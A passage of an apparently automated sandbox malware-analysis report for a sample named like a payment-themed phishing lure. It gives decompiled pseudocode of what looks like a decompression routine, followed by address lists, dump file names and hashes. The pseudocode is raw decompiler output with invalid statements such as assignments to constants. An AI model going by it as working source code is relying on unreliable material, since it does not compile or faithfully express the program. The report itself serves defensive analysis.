												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
														 *_t392 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t392;
														goto L120;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L112:
														_t369 = __ebp - 0x48;
														 *_t369 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t369;
														goto L113;
													} else {
														goto L110;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L102:
													_t339 = __ebp - 0x48;
													 *_t339 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t339;
													goto L103;
												} else {
													goto L100;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L109;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L124:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t415 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t415;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t415;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											L170:
											_push(0x22);
											_pop(_t567);
											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
											_t535 = 0;
											L172:
											return _t535;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
						__eax =  *(__ebp - 0x50);
						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							goto L148;
						} else {
							goto L146;
						}
					}
					goto L1;
				}
			}

0x00000000
0x00407395
0x00407395
0x00407399
0x004073be
0x004073c8
0x00000000
0x0040739b
0x0040739b
0x0040739e
0x004073a2
0x004073a5
0x004073a8
0x004073ac
0x004073ac
0x004073af
0x00407489
0x00407489
0x00407490
0x00407490
0x00407493
0x0040749a
0x004074c7
0x004074cb
0x0040752b
0x0040752e
0x00407533
0x00407534
0x00407536
0x00407538
0x0040753b
0x00407447
0x00407447
0x00407447
0x00406be3
0x00406be3
0x00406be3
0x00406bec
0x00000000
0x00000000
0x00406bf2
0x00000000
0x00406bfd
0x00000000
0x00000000
0x00406c06
0x00406c09
0x00406c0c
0x00406c10
0x00000000
0x00000000
0x00406c16
0x00406c19
0x00406c1b
0x00406c1c
0x00406c1f
0x00406c21
0x00406c22
0x00406c24
0x00406c27
0x00406c2c
0x00406c31
0x00406c3a
0x00406c4d
0x00406c50
0x00406c5c
0x00406c84
0x00406c86
0x00406c94
0x00406c94
0x00406c98
0x00000000
0x00000000
0x00000000
0x00000000
0x00406c88
0x00406c88
0x00406c8b
0x00406c8c
0x00406c8c
0x00000000
0x00406c88
0x00406c62
0x00406c67
0x00406c67
0x00406c70
0x00406c78
0x00406c7b
0x00000000
0x00406c81
0x00406c81
0x00000000
0x00406c81
0x00000000
0x00406c9e
0x00406c9e
0x00406ca2
0x0040754e
0x00000000
0x0040754e
0x00406cab
0x00406cbb
0x00406cbe
0x00406cc1
0x00406cc1
0x00406cc1
0x00406cc4
0x00406cc8
0x00000000
0x00000000
0x00406cca
0x00406cd0
0x00406cfa
0x00406d00
0x00406d07
0x00000000
0x00406d07
0x00406cd6
0x00406cd9
0x00406cde
0x00406cde
0x00406ce9
0x00406cf1
0x00406cf4
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406d39
0x00406d3f
0x00406d42
0x00406d4f
0x00406d57
0x00000000
0x00000000
0x00406d0e
0x00406d0e
0x00406d12
0x0040755d
0x00000000
0x0040755d
0x00406d1e
0x00406d29
0x00406d29
0x00406d29
0x00406d2c
0x00406d2f
0x00406d32
0x00406d37
0x00000000
0x00000000
0x00000000
0x00000000
0x004073ce
0x004073ce
0x004073d4
0x004073da
0x004073e0
0x004073fa
0x004073fd
0x00407403
0x0040740e
0x0040740e
0x00407410
0x004073e2
0x004073e2
0x004073f1
0x004073f5
0x004073f5
0x0040741a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040741c
0x00407420
0x004075cf
0x00000000
0x004075cf
0x0040742c
0x00407433
0x0040743b
0x0040743e
0x00407441
0x00407441
0x00000000
0x00000000
0x00406d5f
0x00406d61
0x00406d64
0x00406dd5
0x00406dd8
0x00406ddb
0x00406de2
0x00406dec
0x00000000
0x00406dec
0x00406d66
0x00406d6a
0x00406d6d
0x00406d6f
0x00406d72
0x00406d75
0x00406d77
0x00406d7a
0x00406d7c
0x00406d81
0x00406d84
0x00406d87
0x00406d8b
0x00406d92
0x00406d95
0x00406d9c
0x00406da0
0x00406da8
0x00406da8
0x00406da8
0x00406da2
0x00406da2
0x00406da2
0x00406d97
0x00406d97
0x00406d97
0x00406dac
0x00406daf
0x00406dcd
0x00406dcf
0x00000000
0x00406db1
0x00406db1
0x00406db4
0x00406db7
0x00406dba
0x00406dbc
0x00406dbc
0x00406dbc
0x00406dbf
0x00406dc2
0x00406dc4
0x00406dc5
0x00406dc8
0x00000000
0x00406dc8
0x00000000
0x00406ffe
0x00407002
0x00407020
0x00407023
0x0040702a
0x0040702d
0x00407030
0x00407033
0x00407036
0x00407039
0x0040703b
0x00407042
0x00407043
0x00407045
0x00407048
0x0040704b
0x0040704e
0x0040704e
0x00407053
0x00000000
0x00407053
0x00407004
0x00407007
0x0040700a
0x00407014
0x00000000
0x00000000
0x00407068
0x0040706c
0x0040708f
0x00407092
0x00407095
0x0040709f
0x0040706e
0x0040706e
0x00407071
0x00407074
0x00407077
0x00407084
0x00407087
0x00407087
0x00000000
0x00000000
0x004070ab
0x004070af
0x00000000
0x00000000
0x004070b5
0x004070b9
0x00000000
0x00000000
0x004070bf
0x004070c1
0x004070c5
0x004070c5
0x004070c8
0x004070cc
0x00000000
0x00000000
0x0040711c
0x00407120
0x00407127
0x0040712a
0x0040712d
0x00407137
0x00000000
0x00407137
0x00407122
0x00000000
0x00000000
0x00407143
0x00407147
0x0040714e
0x00407151
0x00407154
0x00407149
0x00407149
0x00407149
0x00407157
0x0040715a
0x0040715d
0x0040715d
0x00407160
0x00407163
0x00407166
0x00407166
0x00407169
0x00407170
0x00407175
0x00000000
0x00000000
0x00407203
0x00407203
0x00407207
0x004075a5
0x00000000
0x004075a5
0x0040720d
0x00407210
0x00407213
0x00407217
0x0040721a
0x00407220
0x00407222
0x00407222
0x00407222
0x00407225
0x00407228
0x00000000
0x00000000
0x00406df8
0x00406df8
0x00406dfc
0x00407569
0x00000000
0x00407569
0x00406e02
0x00406e05
0x00406e08
0x00406e0c
0x00406e0f
0x00406e15
0x00406e17
0x00406e17
0x00406e17
0x00406e1a
0x00406e1d
0x00406e1d
0x00406e20
0x00406e23
0x00000000
0x00000000
0x00406e29
0x00406e2f
0x00000000
0x00000000
0x00406e35
0x00406e35
0x00406e39
0x00406e3c
0x00406e3f
0x00406e42
0x00406e45
0x00406e46
0x00406e49
0x00406e4b
0x00406e51
0x00406e54
0x00406e57
0x00406e5a
0x00406e5d
0x00406e60
0x00406e63
0x00406e7f
0x00406e82
0x00406e85
0x00406e88
0x00406e8f
0x00406e93
0x00406e95
0x00406e99
0x00406e65
0x00406e65
0x00406e69
0x00406e71
0x00406e76
0x00406e78
0x00406e7a
0x00406e7a
0x00406e9c
0x00406ea3
0x00406ea6
0x00000000
0x00406eac
0x00000000
0x00406eac
0x00000000
0x00406eb1
0x00406eb1
0x00406eb5
0x00407575
0x00000000
0x00407575
0x00406ebb
0x00406ebe
0x00406ec1
0x00406ec5
0x00406ec8
0x00406ece
0x00406ed0
0x00406ed0
0x00406ed0
0x00406ed3
0x00406ed6
0x00406ed6
0x00406ed6
0x00406edc
0x00000000
0x00000000
0x00406ede
0x00406ee1
0x00406ee4
0x00406ee7
0x00406eea
0x00406eed
0x00406ef0
0x00406ef3
0x00406ef6
0x00406ef9
0x00406efc
0x00406f14
0x00406f17
0x00406f1a
0x00406f1d
0x00406f1d
0x00406f20
0x00406f24
0x00406f26
0x00406efe
0x00406efe
0x00406f06
0x00406f0b
0x00406f0d
0x00406f0f
0x00406f0f
0x00406f29
0x00406f30
0x00406f33
0x00000000
0x00406f35
0x00000000
0x00406f35
0x00406f33
0x00406f3a
0x00406f3a
0x00406f3a
0x00406f3a
0x00000000
0x00000000
0x00406f75
0x00406f75
0x00406f79
0x00407581
0x00000000
0x00407581
0x00406f7f
0x00406f82
0x00406f85
0x00406f89
0x00406f8c
0x00406f92
0x00406f94
0x00406f94
0x00406f94
0x00406f97
0x00406f9a
0x00406f9a
0x00406fa0
0x00406f3e
0x00406f3e
0x00406f41
0x00000000
0x00406f41
0x00406fa2
0x00406fa2
0x00406fa5
0x00406fa8
0x00406fab
0x00406fae
0x00406fb1
0x00406fb4
0x00406fb7
0x00406fba
0x00406fbd
0x00406fc0
0x00406fd8
0x00406fdb
0x00406fde
0x00406fe1
0x00406fe1
0x00406fe4
0x00406fe8
0x00406fea
0x00406fc2
0x00406fc2
0x00406fca
0x00406fcf
0x00406fd1
0x00406fd3
0x00406fd3
0x00406fed
0x00406ff4
0x00406ff7
0x00000000
0x00406ff9
0x00000000
0x00406ff9
0x00000000
0x00407286
0x00407286
0x0040728a
0x004075b1
0x00000000
0x004075b1
0x00407290
0x00407293
0x00407296
0x0040729a
0x0040729d
0x004072a3
0x004072a5
0x004072a5
0x004072a5
0x004072a8
0x00000000
0x00000000
0x00407056
0x00407056
0x00407059
0x004073cb
0x004073cb
0x00000000
0x00000000
0x00000000
0x00000000
0x00407452
0x00407456
0x00407474
0x00407474
0x00407474
0x0040747b
0x00407482
0x00000000
0x00407482
0x00407458
0x0040745b
0x0040745e
0x00407461
0x00407468
0x00000000
0x00000000
0x00407543
0x00407546
0x00407447
0x00407447
0x00000000
0x00000000
0x0040717d
0x0040717f
0x00407186
0x00407187
0x00407189
0x0040718c
0x00000000
0x00000000
0x00407194
0x00407197
0x0040719a
0x0040719c
0x0040719e
0x0040719e
0x0040719f
0x004071a2
0x004071a9
0x004071ac
0x004071ba
0x00000000
0x00000000
0x00000000
0x00000000
0x0040749f
0x0040749f
0x004074a3
0x004075db
0x00000000
0x004075db
0x004074a9
0x004074ac
0x004074af
0x004074b3
0x004074b6
0x004074bc
0x004074be
0x004074be
0x004074be
0x004074c1
0x004074c4
0x004074c4
0x004074c4
0x004074c4
0x00000000
0x00000000
0x004071c2
0x004071c5
0x004071fb
0x0040732b
0x0040732b
0x0040732b
0x0040732b
0x0040732e
0x0040732e
0x00407331
0x00407333
0x004075bd
0x00000000
0x004075bd
0x00407339
0x0040733c
0x00000000
0x00000000
0x00407342
0x00407346
0x00407349
0x00407349
0x00407349
0x00000000
0x00407349
0x004071c7
0x004071c9
0x004071cb
0x004071cd
0x004071d0
0x004071d1
0x004071d3
0x004071d5
0x004071d8
0x004071db
0x004071f1
0x004071f6
0x0040722e
0x0040722e
0x00407232
0x0040725e
0x00407260
0x00407267
0x0040726a
0x0040726d
0x0040726d
0x00407272
0x00407272
0x00407274
0x00407277
0x0040727e
0x00407281
0x004072ae
0x004072ae
0x004072b1
0x004072b4
0x00407328
0x00407328
0x00407328
0x00000000
0x00407328
0x004072b6
0x004072bc
0x004072bf
0x004072c2
0x004072c5
0x004072c8
0x004072cb
0x004072ce
0x004072d1
0x004072d4
0x004072d7
0x004072f0
0x004072f2
0x004072f5
0x004072f6
0x004072f9
0x004072fb
0x004072fe
0x00407300
0x00407302
0x00407305
0x00407307
0x0040730a
0x0040730e
0x00407310
0x00407310
0x00407311
0x00407314
0x00407317
0x004072d9
0x004072d9
0x004072e1
0x004072e6
0x004072e8
0x004072eb
0x004072eb
0x0040731a
0x00407321
0x004072ab
0x004072ab
0x004072ab
0x004072ab
0x00000000
0x00407323
0x00000000
0x00407323
0x00407321
0x00407234
0x00407237
0x00407239
0x0040723c
0x0040723f
0x00407242
0x00407244
0x00407247
0x0040724a
0x0040724a
0x0040724d
0x0040724d
0x00407250
0x00407257
0x0040722b
0x0040722b
0x0040722b
0x0040722b
0x00000000
0x00407259
0x00000000
0x00407259
0x00407257
0x004071dd
0x004071e0
0x004071e2
0x004071e5
0x00000000
0x00000000
0x00406f44
0x00406f44
0x00406f48
0x0040758d
0x00000000
0x0040758d
0x00406f4e
0x00406f51
0x00406f54
0x00406f57
0x00406f5a
0x00406f5d
0x00406f60
0x00406f62
0x00406f65
0x00406f68
0x00406f6b
0x00406f6d
0x00406f6d
0x00406f6d
0x00000000
0x00000000
0x004070cf
0x004070cf
0x004070d3
0x00407599
0x00000000
0x00407599
0x004070d9
0x004070dc
0x004070df
0x004070e2
0x004070e4
0x004070e4
0x004070e4
0x004070e7
0x004070ea
0x004070ed
0x004070f0
0x004070f3
0x004070f6
0x004070f7
0x004070f9
0x004070f9
0x004070f9
0x004070fc
0x004070ff
0x00407102
0x00407105
0x00407105
0x00407105
0x00407108
0x0040710a
0x0040710a
0x00000000
0x00000000
0x0040734c
0x0040734c
0x0040734c
0x00407350
0x00000000
0x00000000
0x00407356
0x00407359
0x0040735c
0x0040735f
0x00407361
0x00407361
0x00407361
0x00407364
0x00407367
0x0040736a
0x0040736d
0x00407370
0x00407373
0x00407374
0x00407376
0x00407376
0x00407376
0x00407379
0x0040737c
0x0040737f
0x00407382
0x00407385
0x00407389
0x0040738b
0x0040738e
0x00000000
0x00407390
0x0040710d
0x0040710d
0x00000000
0x0040710d
0x0040738e
0x004075c3
0x004075e5
0x004075eb
0x004075ed
0x004075f4
0x004075f6
0x004075fd
0x00407601
0x00000000
0x00406bf2
0x004075fa
0x004075fa
0x00000000
0x004075fa
0x00407447
0x004074cd
0x004074d3
0x004074d6
0x004074d9
0x004074dc
0x004074df
0x004074e2
0x004074e5
0x004074e8
0x004074ee
0x00407507
0x0040750a
0x0040750d
0x00407510
0x00407514
0x00407516
0x00407517
0x0040751a
0x004074f0
0x004074f0
0x004074f8
0x004074fd
0x004074ff
0x00407502
0x00407502
0x00407524
0x00000000
0x00407526
0x00000000
0x00407526
0x00407524
0x00000000
0x00407399

Memory Dump Source

Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
Instruction ID: d49815ad38d406b3cd0a1a90ea7be1526168d9e39684835ffa6a026ef1ef4849
Opcode Fuzzy Hash: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
Instruction Fuzzy Hash: 91913270D04228DBEF28CF98C8547ADBBB1FF44305F14816AD856BB281D778A986DF45

Uniqueness

Uniqueness Score: -1.00%

Function 004070AB Relevance: 5.2, APIs: 4, Instructions: 205
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E004070AB() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
